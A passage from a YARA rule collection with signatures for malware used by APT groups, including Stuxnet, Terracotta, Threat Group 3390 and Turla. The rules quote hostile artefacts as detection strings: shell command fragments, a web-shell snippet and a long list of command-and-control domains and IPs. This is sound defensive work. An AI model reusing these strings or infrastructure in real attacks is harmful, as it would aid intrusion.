    description = "sphinx moth threat group file kerberos32.dll"
    author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
    reference = "www.kudelskisecurity.com"
    date = "2015-08-06"
  strings:
    $x1 = "%WINDIR%\\ativpsrz.bin" ascii fullword
    $x2 = "%WINDIR%\\ativpsrn.bin" ascii fullword
    $x3 = "kerberos32.dll" wide fullword
    $x4 = "KERBEROS64.dll" ascii fullword
    $x5 = "kerberos%d.dll" ascii fullword
    $s1 = "\\\\.\\pipe\\lsassp" ascii fullword
    $s2 = "LSASS secure pipe" ascii fullword
    $s3 = "NullSessionPipes" ascii fullword
    $s4 = "getlog" ascii fullword
    $s5 = "startlog" ascii fullword
    $s6 = "stoplog" ascii fullword
    $s7 = "Unsupported OS (%d)" ascii fullword
    $s8 = "Unsupported OS (%s)" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and (2 of ($x*) or all of ($s*))
}

rule Sphinx_Moth_kerberos64 {
  meta:
    description = "sphinx moth threat group file kerberos64.dll"
    author = "Kudelski Security - Nagravision SA (modified by Florian Roth)"
    reference = "www.kudelskisecurity.com"
    date = "2015-08-06"
  strings:
    $s0 = "KERBEROS64.dll" ascii fullword
    $s1 = "zeSecurityDescriptor" ascii fullword
    $s2 = "SpGetInfo" ascii fullword
    $s3 = "SpShutdown" ascii fullword
    $op0 = { 75 05 E8 6A C7 FF FF 48 8B 1D 47 D6 00 00 33 FF }
    $op1 = { 48 89 05 0C 2B 01 00 C7 05 E2 29 01 00 09 04 00 }
    $op2 = { 48 8D 3D E3 EE 00 00 BA 58 }
  condition:
    uint16(0) == 23117 and filesize < 415744 and all of ($s*) and 1 of ($op*)
}

rule Sphinx_Moth_nvcplex {
  meta:
    description = "sphinx moth threat group file nvcplex.dat"
    author = "Kudelski Security - Nagravision SA"
    reference = "www.kudelskisecurity.com"
    date = "2015-08-06"
  strings:
    $s0 = "mshtaex.exe" wide fullword
    $op0 = { 41 8B CC 44 89 6C 24 28 48 89 7C 24 20 FF 15 D3 }
    $op1 = { 48 3B 0D AD 8F 00 00 74 05 E8 BA F5 FF FF 48 8B }
    $op2 = { 8B CE E8 49 47 00 00 90 8B 43 04 89 05 93 F1 00 }
  condition:
    uint16(0) == 23117 and filesize < 219136 and all of them
}

rule StuxNet_Malware_1 {
  meta:
    description = "Stuxnet Sample - file malware.exe"
    author = "Florian Roth"
    reference = "Internal Research"
    date = "2016-07-09"
    hash1 = "9c891edb5da763398969b6aaa86a5d46971bd28a455b20c2067cb512c9f9a0f8"
  strings:
    $op1 = { 8B 45 08 35 DD 79 19 AE 33 C9 8B 55 08 89 02 89 }
    $op2 = { 74 36 8B 7F 08 83 FF 00 74 2E 0F B7 1F 8B 7F 04 }
    $op3 = { 74 70 81 78 05 8D 54 24 04 75 1B 81 78 08 04 CD }
  condition:
    all of them
}

rule Stuxnet_Malware_2 {
  meta:
    description = "Stuxnet Sample - file 63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802"
    author = "Florian Roth"
    reference = "Internal Research"
    date = "2016-07-09"
    hash1 = "63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802"
  strings:
    $s1 = "\\SystemRoot\\System32\\hal.dll" wide fullword
    $s2 = "http://www.jmicron.co.tw0" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 71680 and all of them
}

rule StuxNet_dll {
  meta:
    description = "Stuxnet Sample - file dll.dll"
    author = "Florian Roth"
    reference = "Internal Research"
    date = "2016-07-09"
    hash1 = "9e392277f62206098cf794ddebafd2817483cfd57ec03c2e05e7c3c81e72f562"
  strings:
    $s1 = "SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and $s1
}

rule Stuxnet_Shortcut_to {
  meta:
    description = "Stuxnet Sample - file Copy of Shortcut to.lnk"
    author = "Florian Roth"
    reference = "Internal Research"
    date = "2016-07-09"
    hash1 = "801e3b6d84862163a735502f93b9663be53ccbdd7f12b0707336fecba3a829a2"
  strings:
    $x1 = "\\\\.\\STORAGE#Volume#_??_USBSTOR#Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_PMAP#5B6B098B97BE&0#{53f56307-b6bf-11d0-94f2-00a0c" wide
  condition:
    uint16(0) == 76 and filesize < 10240 and $x1
}

rule Stuxnet_Malware_3 {
  meta:
    description = "Stuxnet Sample - file ~WTR4141.tmp"
    author = "Florian Roth"
    reference = "Internal Research"
    date = "2016-07-09"
    hash1 = "6bcf88251c876ef00b2f32cf97456a3e306c2a263d487b0a50216c6e3cc07c6a"
    hash2 = "70f8789b03e38d07584f57581363afa848dd5c3a197f2483c6dfa4f3e7f78b9b"
  strings:
    $x1 = "SHELL32.DLL.ASLR." wide fullword
    $s1 = "~WTR4141.tmp" wide fullword
    $s2 = "~WTR4132.tmp" wide fullword
    $s3 = "totalcmd.exe" wide fullword
    $s4 = "wincmd.exe" wide fullword
    $s5 = "http://www.realtek.com0" ascii fullword
    $s6 = "{%08x-%08x-%08x-%08x}" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 153600 and ($x1 or 3 of ($s*))) or (5 of them)
}

rule Stuxnet_Malware_4 {
  meta:
    description = "Stuxnet Sample - file 0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198"
    author = "Florian Roth"
    reference = "Internal Research"
    date = "2016-07-09"
    hash1 = "0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198"
    hash2 = "1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c"
  strings:
    $x1 = "\\objfre_w2k_x86\\i386\\guava.pdb" ascii
    $x2 = "MRxCls.sys" wide fullword
    $x3 = "MRXNET.Sys" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 81920 and 1 of them) or (all of them)
}

rule Stuxnet_maindll_decrypted_unpacked {
  meta:
    description = "Stuxnet Sample - file maindll.decrypted.unpacked.dll_"
    author = "Florian Roth"
    reference = "Internal Research"
    date = "2016-07-09"
    hash1 = "4c3d7b38339d7b8adf73eaf85f0eb9fab4420585c6ab6950ebd360428af11712"
  strings:
    $s1 = "%SystemRoot%\\system32\\Drivers\\mrxsmb.sys;%SystemRoot%\\system32\\Drivers\\*.sys" wide fullword
    $s2 = "<Actions Context=\"%s\"><Exec><Command>%s</Command><Arguments>%s,#%u</Arguments></Exec></Actions>" wide fullword
    $s3 = "%SystemRoot%\\inf\\oem7A.PNF" wide fullword
    $s4 = "%SystemRoot%\\inf\\mdmcpq3.PNF" wide fullword
    $s5 = "%SystemRoot%\\inf\\oem6C.PNF" wide fullword
    $s6 = "@abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @" wide
    $s7 = "STORAGE#Volume#1&19f7e59c&0&" wide fullword
    $s8 = "view MCPVREADVARPERCON as select VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPARAMETER,PROTOKOLL,MAXLIMI" ascii
  condition:
    6 of them
}

rule Stuxnet_s7hkimdb {
  meta:
    description = "Stuxnet Sample - file s7hkimdb.dll"
    author = "Florian Roth"
    reference = "Internal Research"
    date = "2016-07-09"
    hash1 = "4071ec265a44d1f0d42ff92b2fa0b30aafa7f6bb2160ed1d0d5372d70ac654bd"
  strings:
    $x1 = "S7HKIMDX.DLL" wide fullword
    $op1 = { 8B 45 08 35 DD 79 19 AE 33 C9 8B 55 08 89 02 89 }
    $op2 = { 74 36 8B 7F 08 83 FF 00 74 2E 0F B7 1F 8B 7F 04 }
    $op3 = { 74 70 81 78 05 8D 54 24 04 75 1B 81 78 08 04 CD }
  condition:
    (uint16(0) == 23117 and filesize < 40960 and $x1 and all of ($op*))
}

rule Stuxnet_MadeInPython {
  meta:
    description = "Python has been used frequently by threat actors for compiling executable file with source code. I found python Stuxnet source code that can be executed with required dependencies. This rule is created in hopes to catch potental breakout of future Stuxnet."
    author = "Jin Kim"
    reference = "https://github.com/kenmueller/stuxnet"
    date = "2020-12-23"
  strings:
    $str1 = "old_infected_attributes = node_infected_attributes(graph)"
    $str2 = "NodeType.DISCONNECTED_COMPUTER"
    $str3 = "add_computer_nodes(graph, EdgeType.LOCAL_WIRELESS, router_node)"
  condition:
    any of them
}

rule Apolmy_Privesc_Trojan {
  meta:
    description = "Apolmy Privilege Escalation Trojan used in APT Terracotta"
    author = "Florian Roth"
    reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
    date = "2015-08-04"
    score = 80
    hash = "d7bd289e6cee228eb46a1be1fcdc3a2bd5251bc1eafb59f8111756777d8f373d"
  strings:
    $s1 = "[%d] Failed, %08X" ascii fullword
    $s2 = "[%d] Offset can not fetched." ascii fullword
    $s3 = "PowerShadow2011" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and all of them
}

rule Mithozhan_Trojan {
  meta:
    description = "Mitozhan Trojan used in APT Terracotta"
    author = "Florian Roth"
    reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
    date = "2015-08-04"
    score = 70
    hash = "8553b945e2d4b9f45c438797d6b5e73cfe2899af1f9fd87593af4fd7fb51794a"
  strings:
    $s1 = "adbrowser" wide fullword
    $s2 = "IJKLlGdmaWhram0vn36BgIOChYR3L45xcHNydXQvhmloa2ptbH8voYCDTw==" ascii fullword
    $s3 = "EFGHlGdmaWhrL41sf36BgIOCL6R3dk8=" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and all of them
}

rule RemoteExec_Tool {
  meta:
    description = "Remote Access Tool used in APT Terracotta"
    author = "Florian Roth"
    reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
    date = "2015-08-04"
    hash = "a550131e106ff3c703666f15d55d9bc8c816d1cb9ac1b73c2e29f8aa01e53b78"
  strings:
    $s0 = "cmd.exe /q /c \"%s\"" ascii fullword
    $s1 = "\\\\.\\pipe\\%s%s%d" ascii fullword
    $s2 = "This is a service executable! Couldn't start directly." ascii fullword
    $s3 = "\\\\.\\pipe\\TermHlp_communicaton" ascii fullword
    $s4 = "TermHlp_stdout" ascii fullword
    $s5 = "TermHlp_stdin" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 76800 and 4 of ($s*)
}

rule LiuDoor_Malware_1 {
  meta:
    description = "Liudoor Trojan used in Terracotta APT"
    author = "Florian Roth"
    reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
    date = "2015-08-04"
    score = 70
    super_rule = 1
    hash1 = "deed6e2a31349253143d4069613905e1dfc3ad4589f6987388de13e33ac187fc"
    hash2 = "4575e7fc8f156d1d499aab5064a4832953cd43795574b4c7b9165cdc92993ce5"
    hash3 = "ad1a507709c75fe93708ce9ca1227c5fefa812997ed9104ff9adfec62a3ec2bb"
  strings:
    $s1 = "svchostdllserver.dll" ascii fullword
    $s2 = "SvcHostDLL: RegisterServiceCtrlHandler %S failed" ascii fullword
    $s3 = "\\nbtstat.exe" ascii fullword
    $s4 = "DataVersionEx" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 153600 and all of them
}

rule LiuDoor_Malware_2 {
  meta:
    description = "Liudoor Trojan used in Terracotta APT"
    author = "Florian Roth"
    reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
    date = "2015-08-04"
    score = 70
    super_rule = 1
    hash1 = "f3fb68b21490ded2ae7327271d3412fbbf9d705c8003a195a705c47c98b43800"
    hash2 = "e42b8385e1aecd89a94a740a2c7cd5ef157b091fabd52cd6f86e47534ca2863e"
  strings:
    $s0 = "svchostdllserver.dll" ascii fullword
    $s1 = "Lpykh~mzCCRv|mplpykCCHvq{phlCC\\jmmzqkIzmlvpqCC" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and all of them
}

rule liudoor {
  meta:
    author = "RSA FirstWatch"
    date = "2015-07-23"
    description = "Detects Liudoor daemon backdoor"
    hash0 = "78b56bc3edbee3a425c96738760ee406"
    hash1 = "5aa0510f6f1b0e48f0303b9a4bfc641e"
    hash2 = "531d30c8ee27d62e6fbe855299d0e7de"
    hash3 = "2be2ac65fd97ccc97027184f0310f2f3"
    hash4 = "6093505c7f7ec25b1934d3657649ef07"
    type = "Win32 DLL"
  strings:
    $string0 = "Succ"
    $string1 = "Fail"
    $string2 = "pass"
    $string3 = "exit"
    $string4 = "svchostdllserver.dll"
    $string5 = "L$,PQR"
    $string6 = "0/0B0H0Q0W0k0"
    $string7 = "QSUVWh"
    $string8 = "Ht Hu["
  condition:
    all of them
}

rule HttpBrowser_RAT_dropper_Gen1 {
  meta:
    description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper"
    author = "Florian Roth"
    reference = "http://snip.ly/giNB"
    date = "2015-08-06"
    score = 70
    hash1 = "808de72f1eae29e3c1b2c32be1b84c5064865a235866edf5e790d2a7ba709907"
    hash2 = "f6f966d605c5e79de462a65df437ddfca0ad4eb5faba94fc875aba51a4b894a7"
    hash3 = "f424965a35477d822bbadb821125995616dc980d3d4f94a68c87d0cd9b291df9"
    hash4 = "01441546fbd20487cb2525a0e34e635eff2abe5c3afc131c7182113220f02753"
    hash5 = "8cd8159f6e4689f572e2087394452e80e62297af02ca55fe221fe5d7570ad47b"
    hash6 = "10de38419c9a02b80ab7bf2f1f1f15f57dbb0fbc9df14b9171dc93879c5a0c53"
    hash7 = "c2fa67e970d00279cec341f71577953d49e10fe497dae4f298c2e9abdd3a48cc"
  strings:
    $x1 = "1001=cmd.exe" ascii fullword
    $x2 = "1003=ShellExecuteA" ascii fullword
    $x3 = "1002=/c del /q %s" ascii fullword
    $x4 = "1004=SetThreadPriority" ascii fullword
    $op0 = { E8 71 11 00 00 83 C4 10 FF 4D E4 8B F0 78 07 8B }
    $op1 = { E8 85 34 00 00 59 59 8B 86 B4 }
    $op2 = { 8B 45 0C 83 38 00 0F 84 97 }
    $op3 = { 8B 45 0C 83 38 00 0F 84 98 }
    $op4 = { 89 7E 0C FF 15 A0 50 40 00 59 8B D8 6A 20 59 8D }
    $op5 = { 56 8D 85 CD FC FF FF 53 50 88 9D CC FC FF FF E8 }
  condition:
    uint16(0) == 23117 and filesize < 409600 and all of ($x*) and 1 of ($op*)
}

rule HttpBrowser_RAT_Sample1 {
  meta:
    description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com"
    author = "Florian Roth"
    reference = "http://snip.ly/giNB"
    date = "2015-08-06"
    score = 80
    hash1 = "be334d1f8fa65a723af65200a166c2bbdb06690c8b30fafe772600e4662fc68b"
    hash2 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb"
  strings:
    $s0 = "update.hancominc.com" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 102400 and $s0
}

rule HttpBrowser_RAT_Sample2 {
  meta:
    description = "Threat Group 3390 APT Sample - HttpBrowser RAT Sample"
    author = "Florian Roth"
    reference = "http://snip.ly/giNB"
    date = "2015-08-06"
    score = 80
    hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992"
  strings:
    $s0 = "nKERNEL32.DLL" wide fullword
    $s1 = "WUSER32.DLL" wide fullword
    $s2 = "mscoree.dll" wide fullword
    $s3 = "VPDN_LU.exeUT" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 256000 and all of them
}

rule HttpBrowser_RAT_Gen {
  meta:
    description = "Threat Group 3390 APT Sample - HttpBrowser RAT Generic"
    author = "Florian Roth"
    reference = "http://snip.ly/giNB"
    date = "2015-08-06"
    score = 90
    hash1 = "0299493ccb175d452866f5e21d023d3e92cd8d28452517d1d19c0f05f2c5ca27"
    hash2 = "065d055a90da59b4bdc88b97e537d6489602cb5dc894c5c16aff94d05c09abc7"
    hash3 = "05c7291db880f94c675eea336ecd66338bd0b1d49ad239cc17f9df08106e6684"
    hash4 = "07133f291fe022cd14346cd1f0a649aa2704ec9ccadfab809ca9c48b91a7d81b"
    hash5 = "0f8893e87ddec3d98e39a57f7cd530c28e36d596ea0a1d9d1e993dc2cae0a64d"
    hash6 = "108e6633744da6efe773eb78bd0ac804920add81c3dde4b26e953056ac1b26c5"
    hash7 = "1052ad7f4d49542e4da07fa8ea59c15c40bc09a4d726fad023daafdf05866ebb"
    hash8 = "1277ede988438d4168bb5b135135dd3b9ae7d9badcdf1421132ca4692dd18386"
    hash9 = "19be90c152f7a174835fd05a0b6f722e29c648969579ed7587ae036679e66a7b"
    hash10 = "1e7133bf5a9fe5e462321aafc2b7770b8e4183a66c7fef14364a0c3f698a29af"
    hash11 = "2264e5e8fcbdcb29027798b200939ecd8d1d3ad1ef0aef2b8ce7687103a3c113"
    hash12 = "2a1bdeb0a021fb0bdbb328bd4b65167d1f954c871fc33359cb5ea472bad6e13e"
    hash13 = "259a2e0508832d0cf3f4f5d9e9e1adde17102d2804541a9587a9a4b6f6f86669"
    hash14 = "240d9ce148091e72d8f501dbfbc7963997d5c2e881b4da59a62975ddcbb77ca2"
    hash15 = "211a1b195cf2cc70a2caf8f1aafb8426eb0e4bae955e85266490b12b5322aa16"
    hash16 = "2d25c6868c16085c77c58829d538b8f3dbec67485f79a059f24e0dce1e804438"
    hash17 = "2d932d764dd9b91166361d8c023d64a4480b5b587a6087b0ce3d2ac92ead8a7d"
    hash18 = "3556722d9aa37beadfa6ba248a66576f767e04b09b239d3fb0479fa93e0ba3fd"
    hash19 = "365e1d4180e93d7b87ba28ce4369312cbae191151ac23ff4a35f45440cb9be48"
    hash20 = "36c49f18ce3c205152eef82887eb3070e9b111d35a42b534b2fb2ee535b543c0"
    hash21 = "3eeb1fd1f0d8ab33f34183893c7346ddbbf3c19b94ba3602d377fa2e84aaad81"
    hash22 = "3fa8d13b337671323e7fe8b882763ec29b6786c528fa37da773d95a057a69d9a"
  strings:
    $s0 = "%d|%s|%04d/%02d/%02d %02d:%02d:%02d|%ld|%d" wide fullword
    $s1 = "HttpBrowser/1.0" wide fullword
    $s2 = "set cmd : %s" ascii fullword
    $s3 = "\\config.ini" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 46080 and filesize > 20480 and all of them
}

rule PlugX_NvSmartMax_Gen {
  meta:
    description = "Threat Group 3390 APT Sample - PlugX NvSmartMax Generic"
    author = "Florian Roth"
    reference = "http://snip.ly/giNB"
    date = "2015-08-06"
    score = 70
    hash1 = "718fc72942b9b706488575c0296017971170463f6f40fa19b08fc84b79bf0cef"
    hash2 = "1c0379481d17fc80b3330f148f1b87ff613cfd2a6601d97920a0bcd808c718d0"
    hash3 = "555952aa5bcca4fa5ad5a7269fece99b1a04816d104ecd8aefabaa1435f65fa5"
    hash4 = "71f7a9da99b5e3c9520bc2cc73e520598d469be6539b3c243fb435fe02e44338"
    hash5 = "65bbf0bd8c6e1ccdb60cf646d7084e1452cb111d97d21d6e8117b1944f3dc71e"
  strings:
    $s0 = "NvSmartMax.dll" ascii fullword
    $s1 = "NvSmartMax.dll.url" ascii fullword
    $s2 = "Nv.exe" ascii fullword
    $s4 = "CryptProtectMemory failed" ascii fullword
    $s5 = "CryptUnprotectMemory failed" ascii fullword
    $s7 = "r%.*s(%d)%s" wide fullword
    $s8 = " %s CRC " wide fullword
    $op0 = { C6 05 26 49 42 00 01 EB 4A 8D 85 00 F8 FF FF 50 }
    $op1 = { 8D 85 C8 FE FF FF 50 8D 45 C8 50 C6 45 47 00 E8 }
    $op2 = { E8 E6 65 00 00 50 68 10 43 41 00 E8 56 84 00 00 }
  condition:
    uint16(0) == 23117 and filesize < 819200 and all of ($s*) and 1 of ($op*)
}

rule HttpBrowser_RAT_dropper_Gen2 {
  meta:
    description = "Threat Group 3390 APT Sample - HttpBrowser RAT Dropper"
    author = "Florian Roth"
    reference = "http://snip.ly/giNB"
    date = "2015-08-06"
    score = 70
    hash1 = "c57c5a2c322af2835ae136b75283eaaeeaa6aa911340470182a9983ae47b8992"
    hash2 = "dfa984174268a9f364d856fd47cfaca75804640f849624d69d81fcaca2b57166"
  strings:
    $s1 = "navlu.dll.urlUT" ascii fullword
    $s2 = "VPDN_LU.exeUT" ascii fullword
    $s3 = "pnipcn.dllUT" ascii fullword
    $s4 = "\\ssonsvr.exe" ascii fullword
    $s5 = "/c del /q %s" ascii fullword
    $s6 = "\\setup.exe" ascii fullword
    $s7 = "msi.dllUT" ascii fullword
    $op0 = { 8B 45 0C 83 38 00 0F 84 98 }
    $op1 = { E8 DD 07 00 00 FF 35 D8 FB 40 00 8B 35 7C A0 40 }
    $op2 = { 83 FB 08 75 2C 8B 0D F8 AF 40 00 89 4D DC 8B 0D }
    $op3 = { C7 43 18 8C 69 40 00 E9 DA 01 00 00 83 7D F0 00 }
    $op4 = { 6A 01 E9 7C F8 FF FF BF 1A 40 00 96 1B 40 00 01 }
  condition:
    uint16(0) == 23117 and filesize < 409600 and 3 of ($s*) and 1 of ($op*)
}

rule ThreatGroup3390_Strings {
  meta:
    description = "Threat Group 3390 APT - Strings"
    author = "Florian Roth"
    reference = "http://snip.ly/giNB"
    date = "2015-08-06"
    score = 60
  strings:
    $s1 = "\"cmd\" /c cd /d \"c:\\Windows\\Temp\\\"&copy" ascii
    $s2 = "svchost.exe a -k -r -s -m5 -v1024000 -padmin-windows2014"
    $s3 = "ren *.rar *.zip" ascii fullword
    $s4 = "c:\\temp\\ipcan.exe" ascii fullword
    $s5 = "<%eval(Request.Item(\"admin-na-google123!@#" ascii
  condition:
    1 of them and filesize < 30720
}

rule ThreatGroup3390_C2 {
  meta:
    description = "Threat Group 3390 APT - C2 Server"
    author = "Florian Roth"
    reference = "http://snip.ly/giNB"
    date = "2015-08-06"
    score = 60
  strings:
    $s1 = "api.apigmail.com"
    $s2 = "apigmail.com"
    $s3 = "backup.darkhero.org"
    $s4 = "bel.updatawindows.com"
    $s5 = "binary.update-onlines.org"
    $s6 = "blackcmd.com"
    $s7 = "castle.blackcmd.com"
    $s8 = "ctcb.blackcmd.com"
    $s9 = "darkhero.org"
    $s10 = "dav.local-test.com"
    $s11 = "test.local-test.com"
    $s12 = "dev.local-test.com"
    $s13 = "ocean.local-test.com"
    $s14 = "ga.blackcmd.com"
    $s15 = "helpdesk.blackcmd.com"
    $s16 = "helpdesk.csc-na.com"
    $s17 = "helpdesk.hotmail-onlines.com"
    $s18 = "helpdesk.lnip.org"
    $s19 = "hotmail-onlines.com"
    $s20 = "jobs.hotmail-onlines.com"
    $s21 = "justufogame.com"
    $s22 = "lnip.org"
    $s23 = "local-test.com"
    $s24 = "login.hansoftupdate.com"
    $s25 = "long.update-onlines.org"
    $s26 = "longlong.update-onlines.org"
    $s27 = "longshadow.dyndns.org"
    $s28 = "longshadow.update-onlines.org"
    $s29 = "longykcai.update-onlines.org"
    $s30 = "lostself.update-onlines.org"
    $s31 = "mac.navydocument.com"
    $s32 = "mail.csc-na.com"
    $s33 = "mantech.updatawindows.com"
    $s34 = "micr0soft.org"
    $s35 = "microsoft-outlook.org"
    $s36 = "mtc.navydocument.com"
    $s37 = "navydocument.com"
    $s38 = "mtc.update-onlines.org"
    $s39 = "news.hotmail-onlines.com"
    $s40 = "oac.3322.org"
    $s41 = "ocean.apigmail.com"
    $s42 = "pchomeserver.com"
    $s43 = "registre.organiccrap.com"
    $s44 = "security.pomsys.org"
    $s45 = "services.darkhero.org"
    $s46 = "sgl.updatawindows.com"
    $s47 = "shadow.update-onlines.org"
    $s48 = "sonoco.blackcmd.com"
    $s49 = "test.logmastre.com"
    $s50 = "up.gtalklite.com"
    $s51 = "updatawindows.com"
    $s52 = "update-onlines.org"
    $s53 = "update.deepsoftupdate.com"
    $s54 = "update.hancominc.com"
    $s55 = "update.micr0soft.org"
    $s56 = "update.pchomeserver.com"
    $s57 = "urs.blackcmd.com"
    $s58 = "wang.darkhero.org"
    $s59 = "webs.local-test.com"
    $s60 = "word.apigmail.com"
    $s61 = "wordpress.blackcmd.com"
    $s62 = "working.blackcmd.com"
    $s63 = "working.darkhero.org"
    $s64 = "working.hotmail-onlines.com"
    $s65 = "www.trendmicro-update.org"
    $s66 = "www.update-onlines.org"
    $s67 = "x.apigmail.com"
    $s68 = "ykcai.update-onlines.org"
    $s69 = "ykcailostself.dyndns-free.com"
    $s70 = "ykcainobody.dyndns.org"
    $s71 = "zj.blackcmd.com"
    $s72 = "laxness-lab.com"
    $s73 = "google-ana1ytics.com"
    $s74 = "www.google-ana1ytics.com"
    $s75 = "ftp.google-ana1ytics.com"
    $s76 = "hotmailcontact.net"
    $s77 = "208.115.242.36"
    $s78 = "208.115.242.37"
    $s79 = "208.115.242.38"
    $s80 = "66.63.178.142"
    $s81 = "72.11.148.220"
    $s82 = "72.11.141.133"
    $s83 = "74.63.195.236"
    $s84 = "74.63.195.236"
    $s85 = "74.63.195.237"
    $s86 = "74.63.195.238"
    $s87 = "103.24.0.142"
    $s88 = "103.24.1.54"
    $s89 = "106.187.45.162"
    $s90 = "192.151.236.138"
    $s91 = "192.161.61.19"
    $s92 = "192.161.61.20"
    $s93 = "192.161.61.22"
    $s94 = "103.24.1.54"
    $s95 = "67.215.232.179"
    $s96 = "96.44.177.195"
    $s97 = "49.143.192.221"
    $s98 = "67.215.232.181"
    $s99 = "67.215.232.182"
    $s100 = "96.44.182.243"
    $s101 = "96.44.182.245"
    $s102 = "96.44.182.246"
    $s103 = "49.143.205.30"
    $s104 = "working_success@163.com"
    $s105 = "ykcaihyl@163.com"
    $s106 = "working_success@163.com"
    $s107 = "yuming@yinsibaohu.aliyun.com"
  condition:
    uint16(0) == 23117 and 1 of them
}

rule apt_all_JavaScript_ScanboxFramework_obfuscated {
  meta:
    ref = "https://www.fidelissecurity.com/TradeSecret"
  strings:
    $sa1 = /(var|new|return)\s[_\$]+\s?/
    $sa2 = "function"
    $sa3 = "toString"
    $sa4 = "toUpperCase"
    $sa5 = "arguments.length"
    $sa6 = "return"
    $sa7 = "while"
    $sa8 = "unescape("
    $sa9 = "365*10*24*60*60*1000"
    $sa10 = ">> 2"
    $sa11 = "& 3) << 4"
    $sa12 = "& 15) << 2"
    $sa13 = ">> 6) | 192"
    $sa14 = "& 63) | 128"
    $sa15 = ">> 12) | 224"
  condition:
    all of them
}

rule MW_neuron2_loader_strings : Turla APT loader {
  meta:
    description = "Rule for detection of Neuron2 based on strings within the loader"
    author = "NCSC"
    family = "Turla"
    reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware"
    date = "2018-01-18"
    hash1 = "51616b207fde2ff1360a1364ff58270e0d46cf87a4c0c21b374a834dd9676927"
  strings:
    $ = "dcom_api" ascii
    $ = "http://*:80/OWA/OAB/" ascii
    $ = "https://*:443/OWA/OAB/" ascii
    $ = "dcomnetsrv.cpp" wide
    $ = "dcomnet.dll" ascii
    $ = "D:\\Develop\\sps\\neuron2\\x64\\Release\\dcomnet.pdb" ascii
  condition:
    (uint16(0) == 23117 and uint16(uint32(60)) == 17744) and 2 of them
}

rule MW_neuron2_decryption_routine : Turla APT {
  meta:
    description = "Rule for detection of Neuron2 based on the routine used to decrypt the payload"
    author = "NCSC"
    family = "Turla"
    reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware"
    date = "2018-01-18"
    hash1 = "51616b207fde2ff1360a1364ff58270e0d46cf87a4c0c21b374a834dd9676927"
  strings:
    $ = { 81 FA FF 00 00 00 0F B6 C2 0F 46 C2 0F B6 0C 04 48 03 CF 0F B6 D1 8A 0C 14 8D 50 01 43 32 0C 13 41 88 0A 49 FF C2 49 83 E9 01 }
  condition:
    (uint16(0) == 23117 and uint16(uint32(60)) == 17744) and all of them
}

rule MW_neuron2_dotnet_strings : Turla APT {
  meta:
    description = "Rule for detection of the .NET payload for Neuron2 based on strings used"
    author = "NCSC"
    family = "Turla"
    reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware"
    date = "2018-01-18"
    hash1 = "83d8922e7a8212f1a2a9015973e668d7999b90e7000c31f57be83803747df015"
  strings:
    $dotnetMagic = "BSJB" ascii
    $s1 = "http://*:80/W3SVC/" wide
    $s2 = "https://*:443/W3SVC/" wide
    $s3 = "neuron2.exe" ascii
    $s4 = "D:\\Develop\\sps\\neuron2\\neuron2\\obj\\Release\\neuron2.pdb" ascii
  condition:
    (uint16(0) == 23117 and uint16(uint32(60)) == 17744) and $dotnetMagic and 2 of ($s*)
}

rule Turla_APT_srsvc {
  meta:
    description = "Detects Turla malware (based on sample used in the RUAG APT case)"
    author = "Florian Roth"
    family = "Turla"
    reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
    date = "2016-06-09"
    hash1 = "65996f266166dbb479a42a15a236e6564f0b322d5d68ee546244d7740a21b8f7"
    hash2 = "25c7ff1eb16984a741948f2ec675ab122869b6edea3691b01d69842a53aa3bac"
  strings:
    $x1 = "SVCHostServiceDll.dll" ascii fullword
    $s2 = "msimghlp.dll" wide fullword
    $s3 = "srservice" wide fullword
    $s4 = "ModStart" ascii fullword
    $s5 = "ModStop" ascii fullword
  condition:
    (uint16(0) == 23117 and filesize < 20480 and (1 of ($x*) or all of ($s*))) or (all of them)
}

rule Turla_APT_Malware_Gen1 {
  meta:
    description = "Detects Turla malware (based on sample used in the RUAG APT case)"
    author = "Florian Roth"
    family = "Turla"
    reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
    date = "2016-06-09"
    hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
    hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
